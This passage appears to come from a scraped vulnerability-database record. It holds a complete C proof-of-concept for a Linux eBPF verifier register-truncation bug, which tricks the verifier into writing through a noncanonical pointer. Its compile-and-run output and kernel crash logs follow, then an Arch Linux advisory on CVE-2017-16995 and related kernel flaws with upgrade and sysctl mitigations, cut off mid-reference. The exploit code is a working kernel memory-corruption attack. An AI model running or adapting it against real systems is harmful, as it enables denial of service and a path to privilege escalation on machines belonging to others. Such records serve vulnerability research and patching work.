0000000000000004 RDI: 0fff8801ac393b78\r\n[10599.403974] RBP: ffff8801ef6bf968 R08: 0000000000000000 R09: 0000000000000000\r\n[10599.403976] R10: 0000000000000001 R11: ffffed00358726b9 R12: ffffffff870be980\r\n[10599.403978] R13: 1ffff1003ded7f0e R14: 00000000deadbeef R15: 0fff8801ac393b78\r\n[10599.403981] FS: 00007fd705b43700(0000) GS:ffff8801f77c0000(0000)\r\nknlGS:0000000000000000\r\n[10599.403984] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\r\n[10599.403986] CR2: 0000561c31a24008 CR3: 00000001b153b002 CR4: 00000000001606e0\r\n[10599.403991] Call Trace:\r\n[10599.403997] ? sk_filter_trim_cap+0x5c/0x4e0\r\n[10599.404000] ? bpf_jit_compile+0x30/0x30\r\n[10599.404006] ? alloc_skb_with_frags+0x90/0x2c0\r\n[10599.404010] ? __bpf_prog_run32+0x83/0xc0\r\n[10599.404013] ? __bpf_prog_run64+0xc0/0xc0\r\n[10599.404017] ? sk_filter_trim_cap+0x5c/0x4e0\r\n[10599.404022] ? sk_filter_trim_cap+0xf7/0x4e0\r\n[10599.404028] ? unix_dgram_sendmsg+0x3e2/0x960\r\n[10599.404033] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[10599.404036] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[10599.404040] ? sock_alloc_inode+0x46/0x110\r\n[10599.404043] ? unix_stream_connect+0x840/0x840\r\n[10599.404046] ? __sock_create+0x7f/0x2c0\r\n[10599.404049] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[10599.404054] ? __lock_acquire.isra.31+0x2d/0xb40\r\n[10599.404059] ? __wake_up_common_lock+0xaf/0x130\r\n[10599.404065] ? unix_stream_connect+0x840/0x840\r\n[10599.404068] ? sock_sendmsg+0x6b/0x80\r\n[10599.404071] ? sock_write_iter+0x11d/0x1d0\r\n[10599.404075] ? sock_sendmsg+0x80/0x80\r\n[10599.404080] ? do_raw_spin_unlock+0x86/0x120\r\n[10599.404084] ? iov_iter_init+0x77/0xb0\r\n[10599.404089] ? __vfs_write+0x23e/0x340\r\n[10599.404092] ? kernel_read+0xa0/0xa0\r\n[10599.404098] ? __fd_install+0x5/0x160\r\n[10599.404102] ? __fget_light+0x9b/0xb0\r\n[10599.404107] ? vfs_write+0xe9/0x240\r\n[10599.404110] ? SyS_write+0xa7/0x130\r\n[10599.404121] ? SyS_read+0x130/0x130\r\n[10599.404125] ? 
lockdep_sys_exit+0x16/0x8e\r\n[10599.404129] ? lockdep_sys_exit_thunk+0x16/0x2b\r\n[10599.404133] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[10599.404138] Code: 00 48 0f bf 43 fa 49 01 c7 0f b6 43 f9 c0 e8 04\r\n0f b6 c0 4c 8d 74 c5 00 4c 89 f7 e8 04 4a 0f 00 4d 8b 36 4c 89 ff e8\r\n79 49 0f 00 <45> 89 37 e9 17 e6 ff ff 48 8d 7b 01 e8 58 47 0f 00 0f b6\r\n43 01\r\n[10599.404200] RIP: ___bpf_prog_run+0x1a77/0x2490 RSP: ffff8801ef6bf838\r\n[10599.404204] ---[ end trace e8c17e9abe81bd46 ]---\r\n======================================\r\n\r\n\r\n\r\n\r\n=== PoC for \"bpf: fix incorrect tracking of register size truncation\" ===\r\nHere is a crasher that uses this to again write to a noncanonical address:\r\n\r\n\r\n======================================\r\n#define _GNU_SOURCE\r\n#include <err.h>\r\n#include <stdint.h>\r\n#include <linux/bpf.h>\r\n#include <linux/filter.h>\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <sys/syscall.h>\r\n#include <asm/unistd_64.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n\r\n/* start from kernel */\r\n#define BPF_EMIT_CALL(FUNC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_JMP | BPF_CALL, \\\r\n .dst_reg = 0, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = (FUNC) }) /* ??? 
*/\r\n#define BPF_MOV32_IMM(DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_MOV | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_REG_ARG1 BPF_REG_1\r\n#define BPF_REG_ARG2 BPF_REG_2\r\n#define BPF_REG_ARG3 BPF_REG_3\r\n#define BPF_REG_ARG4 BPF_REG_4\r\n#define BPF_REG_ARG5 BPF_REG_5\r\n#define BPF_PSEUDO_MAP_FD 1\r\n#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_LD | BPF_DW | BPF_IMM, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = (__u32) (IMM) }), \\\r\n ((struct bpf_insn) { \\\r\n .code = 0, /* zero is reserved opcode */ \\\r\n .dst_reg = 0, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = ((__u64) (IMM)) >> 32 })\r\n#define BPF_ALU32_IMM(OP, DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_OP(OP) | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_LD_MAP_FD(DST, MAP_FD) \\\r\n BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)\r\n#define BPF_ALU32_REG(OP, DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_OP(OP) | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_EXIT_INSN() \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_JMP | BPF_EXIT, \\\r\n .dst_reg = 0, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n/* Memory store, *(uint *) (dst_reg + off16) = src_reg */\r\n#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = OFF, \\\r\n .imm = 0 })\r\n#define BPF_REG_FP BPF_REG_10\r\n#define BPF_MOV64_REG(DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_MOV | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_ALU64_IMM(OP, DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = 
BPF_ALU64 | BPF_OP(OP) | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_MOV64_REG(DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_MOV | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_REG_TMP BPF_REG_8\r\n#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = OFF, \\\r\n .imm = 0 })\r\n#define BPF_JMP_IMM(OP, DST, IMM, OFF) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_JMP | BPF_OP(OP) | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = OFF, \\\r\n .imm = IMM })\r\n#define BPF_MOV64_IMM(DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_MOV | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_ALU64_REG(OP, DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_MOV32_REG(DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_MOV | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n/* end from kernel */\r\n\r\n\r\nint bpf_(int cmd, union bpf_attr *attrs) {\r\n return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));\r\n}\r\n\r\nvoid array_set(int mapfd, uint32_t key, uint32_t value) {\r\n union bpf_attr attr = {\r\n .map_fd = mapfd,\r\n .key = (uint64_t)&key,\r\n .value = (uint64_t)&value,\r\n .flags = BPF_ANY,\r\n };\r\n\r\n\r\n int res = bpf_(BPF_MAP_UPDATE_ELEM, &attr);\r\n if (res)\r\n err(1, \"map update elem\");\r\n}\r\n\r\n\r\nint main(void) {\r\n union bpf_attr create_map_attrs = {\r\n .map_type = BPF_MAP_TYPE_ARRAY,\r\n .key_size = 4,\r\n .value_size = 8,\r\n .max_entries = 16\r\n };\r\n int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs);\r\n 
if (mapfd == -1)\r\n err(1, \"map create\");\r\n\r\n\r\n array_set(mapfd, 1, 1);\r\n\r\n char verifier_log[100000];\r\n struct bpf_insn insns[] = {\r\n BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),\r\n\r\n // fill r3 with value in range [0x0, 0xf], actually 0x8:\r\n // first load map value pointer...\r\n BPF_MOV64_REG(BPF_REG_TMP, BPF_REG_FP),\r\n BPF_ALU64_IMM(BPF_ADD, BPF_REG_TMP, -4), // allocate 4 bytes stack\r\n BPF_MOV32_IMM(BPF_REG_ARG2, 1),\r\n BPF_STX_MEM(BPF_W, BPF_REG_TMP, BPF_REG_ARG2, 0),\r\n BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_TMP),\r\n BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),\r\n BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),\r\n BPF_MOV64_REG(BPF_REG_0, 0), // prepare exit\r\n BPF_EXIT_INSN(), // exit\r\n\r\n // ... then write, read, mask map value\r\n // (tracing actual values through a map is impossible)\r\n BPF_MOV32_IMM(BPF_REG_3, 8),\r\n BPF_STX_MEM(BPF_W, BPF_REG_0, BPF_REG_3, 0),\r\n BPF_LDX_MEM(BPF_W, BPF_REG_3, BPF_REG_0, 0),\r\n BPF_ALU64_IMM(BPF_AND, BPF_REG_3, 0xf),\r\n\r\n // load r1=0xffff'fff8 while working around the first verifier bug\r\n BPF_MOV32_IMM(BPF_REG_1, 0xfffffff8>>1),\r\n BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_1),\r\n\r\n // r1 in range [0xffff'fff8, 0x1'0000'0007]\r\n BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_3),\r\n\r\n // load r2=0\r\n BPF_MOV32_IMM(BPF_REG_2, 0),\r\n\r\n // trigger verifier bug:\r\n // visible range: [0xffff'fff8, 0xffff'ffff]\r\n // hidden range: [0, 7]\r\n // actual value: 0\r\n BPF_ALU32_REG(BPF_ADD, BPF_REG_1, BPF_REG_2),\r\n\r\n // collapse down: verifier sees 1, actual value 0\r\n BPF_ALU64_IMM(BPF_RSH, BPF_REG_1, 31),\r\n\r\n // flip: verifier sees 0, actual value 1\r\n BPF_ALU64_IMM(BPF_SUB, BPF_REG_1, 1),\r\n BPF_ALU64_IMM(BPF_MUL, BPF_REG_1, -1),\r\n\r\n // r1 = 0x1000'0000'0000'0000, verifier sees 0\r\n BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 60),\r\n\r\n // compute noncanonical pointer\r\n BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),\r\n\r\n // crash by writing to noncanonical pointer\r\n 
BPF_MOV32_IMM(BPF_REG_1, 0xdeadbeef),\r\n BPF_STX_MEM(BPF_W, BPF_REG_0, BPF_REG_1, 0),\r\n\r\n // terminate to make the verifier happy\r\n BPF_MOV32_IMM(BPF_REG_0, 0),\r\n BPF_EXIT_INSN()\r\n };\r\n union bpf_attr create_prog_attrs = {\r\n .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,\r\n .insn_cnt = sizeof(insns) / sizeof(insns[0]),\r\n .insns = (uint64_t)insns,\r\n .license = (uint64_t)\"\",\r\n .log_level = 2,\r\n .log_size = sizeof(verifier_log),\r\n .log_buf = (uint64_t)verifier_log\r\n };\r\n int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs);\r\n if (progfd == -1) {\r\n perror(\"prog load\");\r\n puts(verifier_log);\r\n return 1;\r\n }\r\n puts(\"ok so far?\");\r\n\r\n int socks[2];\r\n if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks))\r\n err(1, \"socketpair\");\r\n if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int)))\r\n err(1, \"setsockopt\");\r\n if (write(socks[1], \"a\", 1) != 1)\r\n err(1, \"write\");\r\n char c;\r\n if (read(socks[0], &c, 1) != 1)\r\n err(1, \"read res\");\r\n return 0;\r\n}\r\n[email\u00a0protected]:~/bpf_range$ gcc -o crasher_badtrunc crasher_badtrunc.c\r\n-Wall && ./crasher_badtrunc\r\nok so far?\r\nSegmentation fault\r\n======================================\r\n\r\n\r\nHere's the resulting crash:\r\n\r\n======================================\r\n[ 117.274571] general protection fault: 0000 [#2] SMP KASAN\r\n[ 117.274575] Modules linked in: binfmt_misc snd_hda_codec_generic\r\nqxl snd_hda_intel snd_hda_codec ttm snd_hda_core drm_kms_helper\r\nsnd_hwdep crct10dif_pclmul snd_pcm drm crc32_pclmul\r\nghash_clmulni_intel snd_timer pcbc aesni_intel aes_x86_64 snd\r\ncrypto_simd evdev glue_helper soundcore ppdev cryptd virtio_balloon sg\r\nvirtio_console serio_raw parport_pc parport pcspkr button ip_tables\r\nx_tables autofs4 ext4 crc16 mbcache jbd2 fscrypto sr_mod sd_mod cdrom\r\nata_generic 8139too ehci_pci virtio_pci crc32c_intel ata_piix uhci_hcd\r\npsmouse virtio_ring virtio floppy ehci_hcd libata usbcore 
scsi_mod\r\n8139cp i2c_piix4 mii\r\n[ 117.274640] CPU: 1 PID: 1197 Comm: crasher_badtrun Tainted: G B\r\nD 4.15.0-rc1+ #4\r\n[ 117.274642] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),\r\nBIOS 1.10.2-1 04/01/2014\r\n[ 117.274645] task: 00000000a02f12e8 task.stack: 0000000051644a73\r\n[ 117.274651] RIP: 0010:___bpf_prog_run+0x1a77/0x2490\r\n[ 117.274654] RSP: 0018:ffff8801af4e7838 EFLAGS: 00010292\r\n[ 117.274657] RAX: 0000000000000000 RBX: ffffc90001305108 RCX: ffffffff928483d7\r\n[ 117.274659] RDX: 0000000000000001 RSI: 0000000000000004 RDI: 0fff8801ac81e0f8\r\n[ 117.274661] RBP: ffff8801af4e7968 R08: 0000000000000000 R09: 0000000000000000\r\n[ 117.274664] R10: 0000000000000001 R11: ffffed003dfa0601 R12: ffffffff932be980\r\n[ 117.274666] R13: 1ffff10035e9cf0e R14: 00000000deadbeef R15: 0fff8801ac81e0f8\r\n[ 117.274669] FS: 00007f3efe927700(0000) GS:ffff8801f7640000(0000)\r\nknlGS:0000000000000000\r\n[ 117.274671] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\r\n[ 117.274674] CR2: 00005654507a9008 CR3: 00000001ec086003 CR4: 00000000001606e0\r\n[ 117.274678] Call Trace:\r\n[ 117.274685] ? sk_filter_trim_cap+0x5c/0x4e0\r\n[ 117.274688] ? bpf_jit_compile+0x30/0x30\r\n[ 117.274693] ? alloc_skb_with_frags+0x90/0x2c0\r\n[ 117.274697] ? __bpf_prog_run32+0x83/0xc0\r\n[ 117.274700] ? __bpf_prog_run64+0xc0/0xc0\r\n[ 117.274705] ? sk_filter_trim_cap+0x5c/0x4e0\r\n[ 117.274710] ? sk_filter_trim_cap+0xf7/0x4e0\r\n[ 117.274715] ? unix_dgram_sendmsg+0x3e2/0x960\r\n[ 117.274720] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[ 117.274724] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[ 117.274728] ? sock_alloc_inode+0x46/0x110\r\n[ 117.274731] ? unix_stream_connect+0x840/0x840\r\n[ 117.274734] ? __sock_create+0x7f/0x2c0\r\n[ 117.274737] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[ 117.274742] ? __lock_acquire.isra.31+0x2d/0xb40\r\n[ 117.274746] ? __wake_up_common_lock+0xaf/0x130\r\n[ 117.274752] ? unix_stream_connect+0x840/0x840\r\n[ 117.274755] ? 
sock_sendmsg+0x6b/0x80\r\n[ 117.274759] ? sock_write_iter+0x11d/0x1d0\r\n[ 117.274762] ? sock_sendmsg+0x80/0x80\r\n[ 117.274768] ? do_raw_spin_unlock+0x86/0x120\r\n[ 117.274782] ? iov_iter_init+0x77/0xb0\r\n[ 117.274786] ? __vfs_write+0x23e/0x340\r\n[ 117.274799] ? kernel_read+0xa0/0xa0\r\n[ 117.274805] ? __fd_install+0x5/0x160\r\n[ 117.274809] ? __fget_light+0x9b/0xb0\r\n[ 117.274813] ? vfs_write+0xe9/0x240\r\n[ 117.274817] ? SyS_write+0xa7/0x130\r\n[ 117.274820] ? SyS_read+0x130/0x130\r\n[ 117.274823] ? lockdep_sys_exit+0x16/0x8e\r\n[ 117.274827] ? lockdep_sys_exit_thunk+0x16/0x2b\r\n[ 117.274831] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[ 117.274836] Code: 00 48 0f bf 43 fa 49 01 c7 0f b6 43 f9 c0 e8 04\r\n0f b6 c0 4c 8d 74 c5 00 4c 89 f7 e8 04 4a 0f 00 4d 8b 36 4c 89 ff e8\r\n79 49 0f 00 <45> 89 37 e9 17 e6 ff ff 48 8d 7b 01 e8 58 47 0f 00 0f b6\r\n43 01\r\n[ 117.274885] RIP: ___bpf_prog_run+0x1a77/0x2490 RSP: ffff8801af4e7838\r\n[ 117.274888] ---[ end trace e84b3275ee7b48c9 ]---\r\n======================================\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/29285", "cvss": {"score": 0.0, "vector": "NONE"}}], "archlinux": [{"lastseen": "2021-07-28T14:34:05", "description": "Arch Linux Security Advisory ASA-201801-1\n=========================================\n\nSeverity: High\nDate : 2018-01-05\nCVE-ID : CVE-2017-16995 CVE-2017-16996 CVE-2017-17449 CVE-2017-17558\nCVE-2017-17712 CVE-2017-17805 CVE-2017-17806 CVE-2017-17852\nCVE-2017-17853 CVE-2017-17854 CVE-2017-17855 CVE-2017-17856\nCVE-2017-17857 CVE-2017-17862 CVE-2017-17863 CVE-2017-17864\nCVE-2017-5754 CVE-2017-8824\nPackage : linux\nType : multiple issues\nRemote : No\nLink : https://security.archlinux.org/AVG-552\n\nSummary\n=======\n\nThe package linux before version 4.14.11-1 is vulnerable to multiple\nissues including access restriction bypass, denial of service,\nprivilege escalation and information disclosure.\n\nResolution\n==========\n\nUpgrade to 
4.14.11-1.\n\n# pacman -Syu \"linux>=4.14.11-1\"\n\nThe problems have been fixed upstream in version 4.14.11.\n\nWorkaround\n==========\n\nBPF related issues can be circumvented by disabling unprivileged BPF:\n\n sysctl -w kernel.unprivileged_bpf_disabled=1\n\nOn systems that do not already have the dccp module loaded,\nCVE-2017-8824 can be mitigated by disabling it:\n\n echo >> /etc/modprobe.d/disable-dccp.conf install dccp false\n\nDescription\n===========\n\n- CVE-2017-16995 (privilege escalation)\n\nAn arbitrary memory r/w access issue was found in the Linux kernel\nbefore 4.14.9, 4.9.72 compiled with the eBPF bpf(2) system call\n(CONFIG_BPF_SYSCALL) support. The issue could occur due to calculation\nerrors in the eBPF verifier module, triggered by user supplied\nmalicious BPF program. An unprivileged user could use this flaw to\nescalate their privileges on a system. Setting parameter\n\"kernel.unprivileged_bpf_disabled=1\" prevents such privilege escalation\nby restricting access to bpf(2) call.\n\n- CVE-2017-16996 (privilege escalation)\n\nAn arbitrary memory r/w access issue was found in the Linux kernel\nbefore 4.14.9 compiled with the eBPF bpf(2) system call\n(CONFIG_BPF_SYSCALL) support. The issue could occur due to calculation\nerrors in the eBPF verifier module, triggered by user supplied\nmalicious BPF program. An unprivileged user could use this flaw to\nescalate their privileges on a system. 
Setting parameter\n\"kernel.unprivileged_bpf_disabled=1\" prevents such privilege escalation\nby restricting access to bpf(2) call.\n\n- CVE-2017-17449 (information disclosure)\n\nThe __netlink_deliver_tap_skb function in net/netlink/af_netlink.c in\nthe Linux kernel before 4.14.11, 4.9.74, 4.4.109, 3.18.91 and 3.16.52\nwhen CONFIG_NLMON is enabled, does not restrict observations of Netlink\nmessages to a single net namespace, which allows local users to obtain\nsensitive information by leveraging the CAP_NET_ADMIN capability to\nsniff an nlmon interface for all Netlink activity on the system.\n\n- CVE-2017-17558 (denial of service)\n\nThe usb_destroy_configuration function in drivers/usb/core/config.c in\nthe USB core subsystem in the Linux kernel before 4.14.8, 4.9.71,\n4.4.107, 3.18.89, 3.16.52 and 3.2.97 does not consider the maximum\nnumber of configurations and interfaces before attempting to release\nresources, which allows local users to cause a denial of service (out-\nof-bounds write access) or possibly have unspecified other impact via a\ncrafted USB device.\n\n- CVE-2017-17712 (privilege escalation)\n\nA flaw was found in the Linux kernel's implementation of raw_sendmsg\nbefore 4.14.11, 4.4.109 and 4.9.74 allowing a local attacker to panic\nthe kernel or possibly leak kernel addresses. 
A local attacker, with\nthe privilege of creating raw sockets, can abuse a possible race\ncondition when setting the socket option to allow the kernel to\nautomatically create ip header values and thus potentially escalate\ntheir privileges.\n\n- CVE-2017-17805 (denial of service)\n\nThe Salsa20 encryption algorithm in the Linux kernel before 4.14.8,\n4.9.71, 4.4.107, 3.18.89, 3.16.52 and 3.2.97 does not correctly handle\nzero-length inputs, allowing a local attacker able to use the AF_ALG-\nbased skcipher interface (CONFIG_CRYPTO_USER_API_SKCIPHER) to cause a\ndenial of service (uninitialized-memory free and kernel crash) or have\nunspecified other impact by executing a crafted sequence of system\ncalls that use the blkcipher_walk API. Both the generic implementation\n(crypto/salsa20_generic.c) and x86 implementation\n(arch/x86/crypto/salsa20_glue.c) of Salsa20 were vulnerable.\n\n- CVE-2017-17806 (denial of service)\n\nThe HMAC implementation (crypto/hmac.c) in the Linux kernel before\n4.14.8, 4.9.71, 4.4.107, 3.18.89, 3.16.52 and 3.2.97 does not validate\nthat the underlying cryptographic hash algorithm is unkeyed, allowing a\nlocal attacker able to use the AF_ALG-based hash interface\n(CONFIG_CRYPTO_USER_API_HASH) and the SHA-3 hash algorithm\n(CONFIG_CRYPTO_SHA3) to cause a kernel stack buffer overflow by\nexecuting a crafted sequence of system calls that encounter a missing\nSHA-3 initialization.\n\n- CVE-2017-17852 (denial of service)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 allows local users to cause a denial of service (memory\ncorruption) or possibly have unspecified other impact by leveraging\nmishandling of 32-bit ALU ops.\n\n- CVE-2017-17853 (denial of service)\n\nIt has been discovered kernel/bpf/verifier.c in the Linux kernel before\n4.14.9 allows local users to cause a denial of service (memory\ncorruption) or possibly have unspecified other impact by leveraging\nincorrect BPF_RSH signed bounds 
calculations.\n\n- CVE-2017-17854 (denial of service)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 allows local users to cause a denial of service (integer\noverflow and memory corruption) or possibly have unspecified other\nimpact by leveraging unrestricted integer values for pointer\narithmetic.\n\n- CVE-2017-17855 (denial of service)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 allows local users to cause a denial of service (memory\ncorruption) or possibly have unspecified other impact by leveraging\nimproper use of pointers in place of scalars.\n\n- CVE-2017-17856 (denial of service)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 allows local users to cause a denial of service (memory\ncorruption) or possibly have unspecified other impact by leveraging the\nlack of stack-pointer alignment enforcement.\n\n- CVE-2017-17857 (denial of service)\n\nThe check_stack_boundary function in kernel/bpf/verifier.c in the Linux\nkernel before 4.14.9 allows local users to cause a denial of service\n(memory corruption) or possibly have unspecified other impact by\nleveraging mishandling of invalid variable stack read operations.\n\n- CVE-2017-17862 (denial of service)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 and 4.9.72 ignore unreachable code, even though it would\nstill be processed by JIT compilers. 
This behavior, also considered an\nimproper branch-pruning logic issue, could possibly be used by local\nusers for denial of service.\n\n- CVE-2017-17863 (denial of service)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 and 4.9.72 does not check the relationship between\npointer values and the BPF stack, which allows local users to cause a\ndenial of service (integer overflow or invalid memory access) or\npossibly have unspecified other impact.\n\n- CVE-2017-17864 (information disclosure)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 and 4.9.73 mishandles states_equal comparisons between\nthe pointer data type and the UNKNOWN_VALUE data type, which allows\nlocal users to obtain potentially sensitive address information, aka a\n\"pointer leak.\"\n\n- CVE-2017-5754 (access restriction bypass)\n\nAn industry-wide issue was found in the way many modern microprocessor\ndesigns have implemented speculative execution of instructions (a\ncommonly used performance optimization).\nThis variant (\"Rogue Data Load\") relies on the fact that, on impacted\nmicroprocessors, during speculative execution of instruction permission\nfaults, exception generation triggered by a faulting access is\nsuppressed until the retirement of the whole instruction block. In a\ncombination with the fact that memory accesses may populate the cache\neven when the block is being dropped and never committed (executed), an\nunprivileged local attacker could use this flaw to read memory from\narbitrary addresses, including privileged (kernel space) and all other\nprocesses running on the system by conducting targeted cache side-\nchannel attacks.\n\n- CVE-2017-8824 (privilege escalation)\n\nA use-after-free vulnerability was found in DCCP socket code affecting\nthe Linux kernel since 2.6.16. 
The dccp_disconnect function in\nnet/dccp/proto.c allows local users to gain privileges or cause a\ndenial of service via an AF_UNSPEC connect system call during the\nDCCP_LISTEN state.\n\nImpact\n======\n\nA local unprivileged attacker is able to escalate privileges, crash the\nsystem, read memory from arbitrary addresses including from the kernel\nand all other processes running on the system or obtain sensitive\ninformation by sniffing an nlmon interface for all Netlink activity on\nthe system.\n\nReferences\n==========\n\nhttps://bugs.archlinux.org/task/56832\nhttps://bugs.chromium.org/p/project-zero/issues/detail?id=1454\nhttp://www.openwall.com/lists/oss-security/2017/12/21/2\nhttps://git.kernel.org/linus/95a762e2c8c942780948091f8f2a4f32fce1ac6f\nhttps://git.kernel.org/linus/0c17d1d2c61936401f4702e1846e2c19b200f958\nhttps://git.kernel.org/linus/93c647643b48f0131f02e45da3bd367d80443291\nhttps://github.com/google/syzkaller/blob/master/docs/linux/found_bugs_usb.md\nhttps://git.kernel.org/linus/48a4ff1c7bb5a32d2e396b03132d20d552c0eca7\nhttp://openwall.com/lists/oss-security/2017/12/12/7\nhttps://git.kernel.org/linus/8f659a03a0ba9289b9aeb9b4470e6fb263d6f483\nhttps://git.kernel.org/linus/ecaaab5649781c5a0effdaf298a925063020500e\nhttps://git.kernel.org/linus/af3ff8045bbf3e32f1a448542e73abb4c8ceb6f1\nhttps://git.kernel.org/linus/468f6eafa6c44cb2c5d8aad35e12f06c240a812a\nhttps://git.kernel.org/linus/4374f256ce8182019353c0c639bb8d0695b4c941\nhttps://git.kernel.org/linus/bb7f0f989ca7de1153bd128a40a71709e339fa03\nhttps://git.kernel.org/linus/179d1c5602997fef5a940c6ddcf31212cbfebd14\nhttps://git.kernel.org/linus/a5ec6ae161d72f01411169a938fa5f8baea16e8f\nhttps://git.kernel.org/linus/ea25f914dc164c8d56b36147ecc86bc65f83c469\nhttps://git.kernel.org/linus/c131187db2d3fa2f8bf32fdf4e9a4ef805168467\nhttps://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=d75d3ee237cee9068022117e059b64bbab617f3d\nhttps://git.kernel.org/linus/de31796c052e47c99b1bb342bc70a
a826733e862\nhttps://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=37435f7e80ef9adc32a69013c18f135e3f434244\nhttps://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory-with-side.html\nhttps://meltdownattack.com\nhttps://xenbits.xen.org/xsa/advisory-254.html\nhttp://blog.cyberus-technology.de/posts/2018-01-03-meltdown.html\nhttps://git.kernel.org/linus/5aa90a84589282b87666f92b6c3c917c8080a9bf\nhttps://git.kernel.org/linus/00a5ae218d57741088068799b810416ac249a9ce\nhttps://git.kernel.org/linus/69c64866ce072dea1d1e59a0d61e0f66c0dffb76\nhttps://security.archlinux.org/CVE-2017-16995\nhttps://security.archlinux.org/CVE-2017-16996\nhttps://security.archlinux.org/CVE-2017-17449\nhttps://security.archlinux.org/CVE-2017-17558\nhttps://security.archlinux.org/CVE-2017-17712\nhttps://security.archlinux.org/CVE-2017-17805\nhttps://security.archlinux.org/CVE-2017-17806\nhttps://security.archlinux.org/CVE-2017-17852\nhttps://security.archlinux.org/CVE-2017-17853\nhttps://security.archlinux.org/CVE-2017-17854\nhttps://security.archlinux.org/CVE-2017-17855\nhttps://security.archlinux.org/CVE-2017-17856\nhttps://security.archli